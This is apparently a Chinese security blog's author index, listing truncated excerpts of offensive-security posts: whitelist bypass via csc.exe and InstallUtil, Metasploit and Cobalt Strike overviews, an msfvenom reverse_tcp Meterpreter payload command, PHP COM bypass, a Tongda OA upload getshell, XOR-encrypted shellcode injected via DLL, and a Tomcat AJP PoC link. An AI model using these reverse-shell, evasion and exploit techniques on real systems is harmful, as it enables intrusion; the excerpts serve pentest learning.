bigdog 发布的文章

需要用到csc.exe,与InstallUtil.execsc.exe是微软.NET Framework 中的C#语言编译器InstallUtil.exe是安装Windows服务工具关于两个文件默认安装位置:(注意x32,x64区别)C:\Windows\Microsoft.NET\Framework\ C:\Windows\Microsoft.NET\Framework64\ .......

渗透测试平台类:Metasploit,这个大家都不陌生了,集信息收集,预渗透,渗透,后渗透,木马,社会工程学于一体的平台,居家旅行,杀人越货之必备。SET(Social-engineer-toolkit) 主要用来做社工平台,邮件伪造,dns劫持,以及office钓鱼。Cobaltstrike,目前来说最好用的针对windows的渗透平台,也是目前最牛逼的APT协同工作平台。扩展性.......

0x00前言原本打算直接写在星球里的,编辑器太垃圾了。我佛了….写的烦躁,直接用博客写0x01环境windows 7:192.168.241.156kali:192.168.1.1080x02实验过程msfvenom生成32位的shellcode msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.108 LPOR.......

Windows下的Bypass利用Windows系统组件COM绕过Windows系统组件COM在Windows默认就存在,是位于System32目录下的wshom.ocx文件。(windows下的bypass方法比较少。)去掉php.ini中 com.allow_dcom前面的分号;。; allow Distributed-COM calls ; http://php.net/com.......

通达oa是一个不错的OA系统,但是这个不错的OA系统,却有一个傻逼上传漏洞,再加上apache的那个奇葩解析漏洞,我靠,简直天作之合啊。下面做一个分析,可以直接getshell附EXP漏洞的具体版本不太清楚,各位就当是一个学习吧。漏洞文件在:在general/vmeet/ 下的 privateUpload.php文件  include_once( "inc/conn.php.......

项目地址:https://github.com/k-fire/shellcode-To-DLL测试环境: win7 win10 cs3.14 msf5 编译环境: win10 VS2019原理C格式shellcode异或加密写入dll文件-当dll被调用或者被注入进其他进程时触发功能-dll功能:解密shellcode并将其注入rundll32.exe进程使用使用dll注入器将其注入.......

0x00 演示GET /cacti/graph_realtime.php?action=countdown&top=0&left=0&local_graph_id=2 HTTP/1.1Host: 192.168.3.152Accept: application/json, text/javascript, /; q=0.01X-Requested-With: XMLHttpReque.......

生成首先生成一个测试的msf shellcodemsfvenom -p windows/x64/exec CMD=calc.exe -f python 把其中的shellcode复制出来留待待会使用原理大部分脚本语言加载 shellcode 其实都是通过 c 的 ffi 去调用操作系统的api,其实并没有太多的技巧在里面,明白了原理,只需要查一下对应的脚本语言怎么调用 c 即可。那么.......

poc利用https://github.com/hypn0s/AJPy漏洞等级高危漏洞描述Tomcat 服务器是一个免费的开放源代码的Web 应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。对于一个初学者来说,可以这样认为,当在一台机器上配置好Apache 服务器,可利用它响应HTML(标准通用标记语言下的一个应.......